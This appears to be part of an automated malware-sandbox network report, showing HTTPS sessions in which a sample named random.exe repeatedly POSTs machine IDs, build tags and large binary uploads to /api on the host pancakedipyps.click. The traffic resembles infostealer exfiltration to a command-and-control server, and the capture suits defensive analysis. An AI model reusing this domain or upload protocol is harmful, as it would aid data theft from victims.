                                      2025-01-08 10:46:59 UTC15331OUTData Raw: 2d 2d 38 33 50 56 49 55 56 49 47 55 48 53 4c 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 32 46 35 39 32 37 31 37 39 44 30 46 44 44 32 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 38 33 50 56 49 55 56 49 47 55 48 53 4c 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 38 33 50 56 49 55 56 49 47 55 48 53 4c 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 38 33 50 56 49 55 56 49 47
                                      Data Ascii: --83PVIUVIGUHSL4Content-Disposition: form-data; name="hwid"12F5927179D0FDD2822D1F4978021086--83PVIUVIGUHSL4Content-Disposition: form-data; name="pid"2--83PVIUVIGUHSL4Content-Disposition: form-data; name="lid"FATE99--test--83PVIUVIG
                                      2025-01-08 10:46:59 UTC2807OUTData Raw: 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5
                                      Data Ascii: (u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECa
                                      2025-01-08 10:47:01 UTC1126INHTTP/1.1 200 OK
                                      Date: Wed, 08 Jan 2025 10:47:01 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Set-Cookie: PHPSESSID=ogp7soeimnslss48u9bvobqtee; expires=Sun, 04 May 2025 04:33:39 GMT; Max-Age=9999999; path=/
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      X-Frame-Options: DENY
                                      X-Content-Type-Options: nosniff
                                      X-XSS-Protection: 1; mode=block
                                      cf-cache-status: DYNAMIC
                                      vary: accept-encoding
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bnvdd5Sk1rvbXXnstMMoL95NkR2RnnpmPxo5TwDRdUJSYDT3TCaMQ2rF4NRonDj4c%2FN3HSgMPLI4wnzGAaJVFUDnJEYqOz33aHK8tVuI95NwxrC1MzxN3DCkya4qC9YCQAZq85U8"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8feb9b605f4d0f8b-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1529&min_rtt=1529&rtt_var=574&sent=10&recv=23&lost=0&retrans=0&sent_bytes=2847&recv_bytes=19099&delivery_rate=1909744&cwnd=237&unsent_bytes=0&cid=b7306fecb02204f2&ts=2078&x=0"
                                      2025-01-08 10:47:01 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                      Data Ascii: fok 8.46.123.189
                                      2025-01-08 10:47:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      3192.168.2.449740188.114.97.34436940C:\Users\user\Desktop\random.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-08 10:47:02 UTC280OUTPOST /api HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: multipart/form-data; boundary=52X1V2I4DH724C
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                      Content-Length: 8759
                                      Host: pancakedipyps.click
                                      2025-01-08 10:47:02 UTC8759OUTData Raw: 2d 2d 35 32 58 31 56 32 49 34 44 48 37 32 34 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 32 46 35 39 32 37 31 37 39 44 30 46 44 44 32 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 35 32 58 31 56 32 49 34 44 48 37 32 34 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 35 32 58 31 56 32 49 34 44 48 37 32 34 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 35 32 58 31 56 32 49 34 44
                                      Data Ascii: --52X1V2I4DH724CContent-Disposition: form-data; name="hwid"12F5927179D0FDD2822D1F4978021086--52X1V2I4DH724CContent-Disposition: form-data; name="pid"2--52X1V2I4DH724CContent-Disposition: form-data; name="lid"FATE99--test--52X1V2I4D
                                      2025-01-08 10:47:03 UTC1131INHTTP/1.1 200 OK
                                      Date: Wed, 08 Jan 2025 10:47:02 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Set-Cookie: PHPSESSID=0sjaed3t7smp46184q3k9vakik; expires=Sun, 04 May 2025 04:33:41 GMT; Max-Age=9999999; path=/
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      X-Frame-Options: DENY
                                      X-Content-Type-Options: nosniff
                                      X-XSS-Protection: 1; mode=block
                                      cf-cache-status: DYNAMIC
                                      vary: accept-encoding
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mNxAJVKm1gzni%2B8DxramevHjJH2CvARnIAUeL2wxhTpptt5qfvpdQBE8Hqh0pVzAtxX9EUgHyqL5XEMylBL0%2Bwfh9LuSpRuZ1v15PZlQO2%2F7o%2F6C8Wyowk3hMzuHv1Y3QzxV%2BxcW"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8feb9b7049ef1879-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1474&min_rtt=1463&rtt_var=570&sent=7&recv=13&lost=0&retrans=0&sent_bytes=2847&recv_bytes=9697&delivery_rate=1882656&cwnd=162&unsent_bytes=0&cid=81b0f7e2e496915b&ts=641&x=0"
                                      2025-01-08 10:47:03 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                      Data Ascii: fok 8.46.123.189
                                      2025-01-08 10:47:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      4192.168.2.449742188.114.97.34436940C:\Users\user\Desktop\random.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-08 10:47:03 UTC281OUTPOST /api HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: multipart/form-data; boundary=97RJBEUIGRL98E
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                      Content-Length: 20412
                                      Host: pancakedipyps.click
                                      2025-01-08 10:47:03 UTC15331OUTData Raw: 2d 2d 39 37 52 4a 42 45 55 49 47 52 4c 39 38 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 32 46 35 39 32 37 31 37 39 44 30 46 44 44 32 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 39 37 52 4a 42 45 55 49 47 52 4c 39 38 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 39 37 52 4a 42 45 55 49 47 52 4c 39 38 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 39 37 52 4a 42 45 55 49 47
                                      Data Ascii: --97RJBEUIGRL98EContent-Disposition: form-data; name="hwid"12F5927179D0FDD2822D1F4978021086--97RJBEUIGRL98EContent-Disposition: form-data; name="pid"3--97RJBEUIGRL98EContent-Disposition: form-data; name="lid"FATE99--test--97RJBEUIG
                                      2025-01-08 10:47:03 UTC5081OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                      Data Ascii: lrQMn 64F6(X&7~`aO
                                      2025-01-08 10:47:04 UTC1131INHTTP/1.1 200 OK
                                      Date: Wed, 08 Jan 2025 10:47:04 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Set-Cookie: PHPSESSID=9cf6r792q4e6ptabpgv8ra1c40; expires=Sun, 04 May 2025 04:33:43 GMT; Max-Age=9999999; path=/
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      X-Frame-Options: DENY
                                      X-Content-Type-Options: nosniff
                                      X-XSS-Protection: 1; mode=block
                                      cf-cache-status: DYNAMIC
                                      vary: accept-encoding
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kergP1V%2FhrPvPu700DDFRSlTmTVFaoRC%2FCl%2FYD8bkctzOTZLJHNAFSnXs0kCcvUVOmZOx3YtStoUvv9D9tQXF6IsdRk3YFIJqXvFxsh9IUeMXYNzq%2BNZSXxen6leik8McUTLMspL"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8feb9b79bf0842ea-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1732&min_rtt=1728&rtt_var=657&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2849&recv_bytes=21373&delivery_rate=1654390&cwnd=143&unsent_bytes=0&cid=2ffd71f01b5ec7c9&ts=648&x=0"
                                      2025-01-08 10:47:04 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                      Data Ascii: fok 8.46.123.189
                                      2025-01-08 10:47:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      5192.168.2.449744188.114.97.34436940C:\Users\user\Desktop\random.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-08 10:47:05 UTC284OUTPOST /api HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: multipart/form-data; boundary=BMBE9NGHHGBJRN9PVAB
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                      Content-Length: 988
                                      Host: pancakedipyps.click
                                      2025-01-08 10:47:05 UTC988OUTData Raw: 2d 2d 42 4d 42 45 39 4e 47 48 48 47 42 4a 52 4e 39 50 56 41 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 32 46 35 39 32 37 31 37 39 44 30 46 44 44 32 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 42 4d 42 45 39 4e 47 48 48 47 42 4a 52 4e 39 50 56 41 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 42 4d 42 45 39 4e 47 48 48 47 42 4a 52 4e 39 50 56 41 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65
                                      Data Ascii: --BMBE9NGHHGBJRN9PVABContent-Disposition: form-data; name="hwid"12F5927179D0FDD2822D1F4978021086--BMBE9NGHHGBJRN9PVABContent-Disposition: form-data; name="pid"1--BMBE9NGHHGBJRN9PVABContent-Disposition: form-data; name="lid"FATE99--te
                                      2025-01-08 10:47:05 UTC1133INHTTP/1.1 200 OK
                                      Date: Wed, 08 Jan 2025 10:47:05 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Set-Cookie: PHPSESSID=gu59cvrhupfs9mokctkt34ml2v; expires=Sun, 04 May 2025 04:33:44 GMT; Max-Age=9999999; path=/
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      X-Frame-Options: DENY
                                      X-Content-Type-Options: nosniff
                                      X-XSS-Protection: 1; mode=block
                                      cf-cache-status: DYNAMIC
                                      vary: accept-encoding
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i70zf5dUZpZR8BLeAQ8bYYii6hUl5ME8WAJFDKZx1Z37iDiB0kbiD0Qax7qu%2FOGAYAzIm%2BdWOgwqwZgLERmRczSgELESjyAK%2BMks9p%2FfFn%2FH14Kyv%2F6Jlon93%2BQLC7VataJrLKXM"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8feb9b819c9d0ca2-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1678&min_rtt=1674&rtt_var=636&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1908&delivery_rate=1709601&cwnd=32&unsent_bytes=0&cid=5d6ecc82cc216db1&ts=474&x=0"
                                      2025-01-08 10:47:05 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                      Data Ascii: fok 8.46.123.189
                                      2025-01-08 10:47:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      6192.168.2.449746188.114.97.34436940C:\Users\user\Desktop\random.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-08 10:47:06 UTC279OUTPOST /api HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: multipart/form-data; boundary=ZR3AKJC6S0A
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                      Content-Length: 584031
                                      Host: pancakedipyps.click
                                      2025-01-08 10:47:06 UTC15331OUTData Raw: 2d 2d 5a 52 33 41 4b 4a 43 36 53 30 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 32 46 35 39 32 37 31 37 39 44 30 46 44 44 32 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 5a 52 33 41 4b 4a 43 36 53 30 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 5a 52 33 41 4b 4a 43 36 53 30 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 5a 52 33 41 4b 4a 43 36 53 30 41 0d 0a 43 6f 6e 74 65
                                      Data Ascii: --ZR3AKJC6S0AContent-Disposition: form-data; name="hwid"12F5927179D0FDD2822D1F4978021086--ZR3AKJC6S0AContent-Disposition: form-data; name="pid"1--ZR3AKJC6S0AContent-Disposition: form-data; name="lid"FATE99--test--ZR3AKJC6S0AConte
                                      2025-01-08 10:47:06 UTC15331OUTData Raw: c9 db 26 b3 dc 9c 26 ba f5 8a 9a 54 e2 a0 bd 4f e8 62 96 2a 36 a2 22 fe 38 13 78 1f 84 ca 2e d5 cc 94 5e e3 c7 0d 0c 6e e5 15 12 1f c3 5e ea 84 81 12 a5 4a 04 fd 79 7a a3 a1 36 66 e8 c8 d9 49 ed f0 bf 3e ee 13 b5 c1 dc 6e e9 27 38 f3 3f 2f 3c 38 b5 66 3e 23 d3 55 f5 20 5b 1d cd 9e 56 37 65 bf 7f 9f 0a d1 77 98 0a d9 d0 57 cd 3b d8 54 3d 51 0d 4a 92 f6 84 14 de 9d 69 e9 e2 3c 93 5f 81 1b e4 ef 81 b6 a0 ea e8 de 84 d3 9c 1d b3 85 26 61 ee 87 52 f6 e2 a6 19 43 2e 6e 3e ca 5d ab bc 21 bc 0d e7 f3 d7 d7 6b 0e 52 cf b3 d3 e7 7d 62 84 01 d0 8b a0 5a a3 52 68 96 45 62 f4 9f e2 dd ab 27 fd 96 bf 84 e7 80 1e 61 df db ba 4f 40 4f 35 60 07 ef 5e 4f 3e f8 c9 75 35 a5 2c b0 d3 4d 85 ef 3e 1b 75 9a 6d 36 b7 b9 ce 3b 49 91 25 53 61 2f 26 ff ac 41 fc d6 89 43 3f 3a 88 7a
                                      Data Ascii: &&TOb*6"8x.^n^Jyz6fI>n'8?/<8f>#U [V7ewW;T=QJi<_&aRC.n>]!kR}bZRhEb'aO@O5`^O>u5,M>um6;I%Sa/&AC?:z
                                      2025-01-08 10:47:06 UTC15331OUTData Raw: 37 5e 51 6c 14 d8 93 9a 5e 36 42 c1 f3 a3 71 1c a0 f8 a9 18 ec cf 9b 29 ed be f1 e4 30 41 25 20 bd 8b 29 37 9b ad 63 e9 5c 67 6d 84 12 f5 b2 78 1e cd c1 20 d8 4d 59 1b ca 7b a1 10 4d 1f da 02 8b 1e 87 cc 2e 36 48 0a ea ba 9d 7f af 74 c1 6f 5f a4 90 da eb 54 1a e1 3b 2d 33 03 4e e0 f3 85 a0 93 17 55 7f df 61 2b 09 22 99 84 41 74 93 dd e5 3c ce 15 31 6c 66 2b cc 2f f6 7a 3d 09 e0 9b b4 be b3 d9 fd 55 40 b9 a6 12 ab b9 e6 d5 f5 34 d4 ce 65 63 e0 31 ac cc e9 36 83 6e 9d 46 cc ef e5 71 1a 6d 85 a8 fb 30 27 25 cf 93 3a 18 91 5e bc 31 84 e7 11 df 78 44 5d 21 de 87 0e 95 e2 ec f3 0c e0 f8 bd f9 87 40 f9 bf c8 c0 d8 9c 2f 8e da fb a2 eb 87 b7 4b 6f 4a 47 85 fb 4e 5d 03 66 22 32 cb 8d 05 39 17 73 5d ec 61 4e d6 46 58 07 47 fb 03 c7 34 86 95 e0 cc e1 63 67 24 53 c8
                                      Data Ascii: 7^Ql^6Bq)0A% )7c\gmx MY{M.6Hto_T;-3NUa+"At<1lf+/z=U@4ec16nFqm0'%:^1xD]!@/KoJGN]f"29s]aNFXG4cg$S
                                      2025-01-08 10:47:06 UTC15331OUTData Raw: 24 1a 83 95 94 8b ac 3f 7a 06 fd c7 52 87 66 9e 87 af 40 39 c8 e0 8b 0e c4 ae c4 ed ea 23 77 5f 35 df b2 36 7e c4 b0 e9 08 f2 00 82 90 73 cf 39 bb 02 c5 df 9d 55 4b 83 b5 2a 05 9c d3 03 42 64 5f ce 51 f6 18 0a 84 67 b7 d4 4a 64 5c fe 2f 7e 7f dc b9 e1 23 7d e1 cb 27 ef 0b 16 9d 03 5b 6c e6 05 cf d7 dc 1d 08 a0 04 78 6d 55 ee c1 56 77 5f b0 3f 1f 55 2d aa 5d 2a 00 0e 25 10 d9 90 eb bc b4 89 db 42 a9 fc 36 91 52 59 90 c7 22 fa d5 dd 89 8a 17 4e a9 f0 bd bd 09 3c e7 cb 4c 88 a6 80 b4 65 18 d9 cf 0d 6f a6 d0 37 22 ef 70 4e 42 bc 09 f0 c8 a5 0c 80 fc 4e 10 bf 9b f9 72 79 f4 3c 41 f4 39 c3 40 4f 5d f2 3e a4 b6 8e 00 9a 01 1e 50 88 8b 65 b5 0d b0 9a bc e0 53 10 21 f7 69 51 09 4f 7a 4a e1 e9 3a fa 4f f5 2f cc 9d 95 82 00 ea f1 af f3 86 00 57 b1 b3 cc e4 b3 b2 0a
                                      Data Ascii: $?zRf@9#w_56~s9UK*Bd_QgJd\/~#}'[lxmUVw_?U-]*%B6RY"N<Leo7"pNBNry<A9@O]>PeS!iQOzJ:O/W
                                      2025-01-08 10:47:06 UTC15331OUTData Raw: 50 78 ad 69 8d 47 a9 29 45 45 b2 07 84 eb f9 72 45 70 8a 7e 4a 07 b9 b9 d1 21 8e d0 2b d9 75 d2 ca e7 a5 35 1a 56 2c a9 39 d7 54 e4 b7 9b c4 18 34 d4 55 75 2b a1 be 33 f2 9e 98 c5 5e 11 97 09 3e 54 6b 25 09 4e dc 68 bc b4 e3 2d 30 e7 b8 37 9a ed 08 7d ed 87 cf f7 d7 cf 6c 8e fc e8 d3 93 62 cb 6b 34 d2 66 5a f6 6b 8f 46 c4 c6 a4 31 78 42 a1 78 79 d7 2f f7 2b 57 cb 54 00 cd 55 65 70 7a 09 32 ab 0e b7 cb 51 51 c5 cf 87 b6 af ac f9 8d b6 6d 58 56 b4 ac bd de 74 8b 8b ac 5b 57 3b c8 93 a8 a2 32 d0 b8 11 ef 71 48 24 cd 90 8b da 06 ec 4d f3 34 43 7f 8e 8e 72 db 80 16 04 ff 7d 4f c5 61 92 69 05 27 e4 47 b4 68 f3 dd c1 55 ef 74 92 43 5e 2d 57 86 d3 3a c5 93 78 18 10 2f 10 5b 1c 44 11 da 42 73 d6 20 be 42 03 bc 73 15 1a 2d b0 8e 82 97 1a a6 ce 3d 12 1f 3e 8f 66 d6
                                      Data Ascii: PxiG)EErEp~J!+u5V,9T4Uu+3^>Tk%Nh-07}lbk4fZkF1xBxy/+WTUepz2QQmXVt[W;2qH$M4Cr}Oai'GhUtC^-W:x/[DBs Bs-=>f
                                      2025-01-08 10:47:06 UTC15331OUTData Raw: 79 9d 96 23 b1 29 26 3d 1d 52 b2 85 dd da 9b 32 62 b1 37 f3 06 be ac c1 44 66 02 9a 1f be c7 08 5c 74 95 0f d5 77 6e ad 31 f6 c4 88 9c a9 42 e0 bc 54 72 cc a2 78 6b c8 e3 d4 b1 d9 e4 6a 87 03 5e 13 7d 6a 85 e9 05 a2 33 64 a4 f9 24 df f7 22 5f c1 be 18 2f 75 9d ec 5d ca ea 18 55 c0 0b 89 8a 32 d7 e6 53 0b b1 fd fe 99 2e 36 93 02 87 75 9a bd 7d b7 f6 09 25 27 ec cd d3 e1 f2 e9 25 42 46 9e a0 f8 d0 c8 0e 90 b9 70 8e d9 c0 38 74 d9 23 d6 14 cb 9a fa 58 f0 a9 b2 0b 72 4b 09 13 40 8e b0 23 7e c5 3f 21 d2 08 d8 c5 5c 9e a9 81 69 a0 46 25 6c 72 7a 26 a7 19 07 f6 ab b5 db c3 8f c1 8c 62 f5 7f 8c 92 d6 e0 c9 d6 2b 3c 81 7b 01 0b aa f2 bd 48 a4 f9 91 53 95 33 d5 c3 07 5e e9 ee fa ea dc 3b dd 9a 56 72 e7 3f 3a 44 77 a5 98 84 83 c5 68 11 8e 23 cf 4f 16 85 06 d7 4e 11
                                      Data Ascii: y#)&=R2b7Df\twn1BTrxkj^}j3d$"_/u]U2S.6u}%'%BFp8t#XrK@#~?!\iF%lrz&b+<{HS3^;Vr?:Dwh#ON
                                      2025-01-08 10:47:06 UTC15331OUTData Raw: 7f 5f b9 5b fa ad f6 9f 57 77 ca f6 95 2e 4d ea ee 26 70 7b 5b ff ae e2 fe 19 de 43 d8 58 4a 6b c5 2e be 52 06 3d 69 02 83 14 18 16 11 30 a9 da bc 2e 0a d2 18 60 b1 6e fc f7 21 90 8d 82 99 da 99 5a 38 0b 40 c8 86 50 08 84 38 58 17 87 72 5e 0f a8 fd 3a 8d e4 85 52 70 72 cb ec 83 3d 06 08 5e b8 28 7e 78 3f 21 6b f3 62 7f fa 47 8d ef 3b 45 4c d1 e1 30 fc ac e9 f2 72 77 77 e5 9f 85 ab a2 a9 61 6c c3 1c b3 0f 31 2c 6f ef 0d f7 17 8f 20 52 86 17 fd 10 98 b5 f6 16 06 22 82 d8 16 c9 ed e6 88 bc e5 f5 92 47 cd b7 2f 8b 6a e2 79 29 b6 ff e8 d2 c3 0b 9e f8 b6 7f e0 55 79 a8 4b 0e 96 87 ee 94 82 20 0c 7c 08 83 7f b7 0b 2f 80 f8 33 95 9e 2d 68 33 56 e5 c7 47 3f fe 76 3c 5d 00 5c fa c1 8e fd 01 0a 5b 88 35 95 49 41 38 1b eb 49 ce ad 99 5c 9e da 92 49 33 e0 1c 91 cf 6e
                                      Data Ascii: _[Ww.M&p{[CXJk.R=i0.`n!Z8@P8Xr^:Rpr=^(~x?!kbG;EL0rwwal1,o R"G/jy)UyK |/3-h3VG?v<]\[5IA8I\I3n
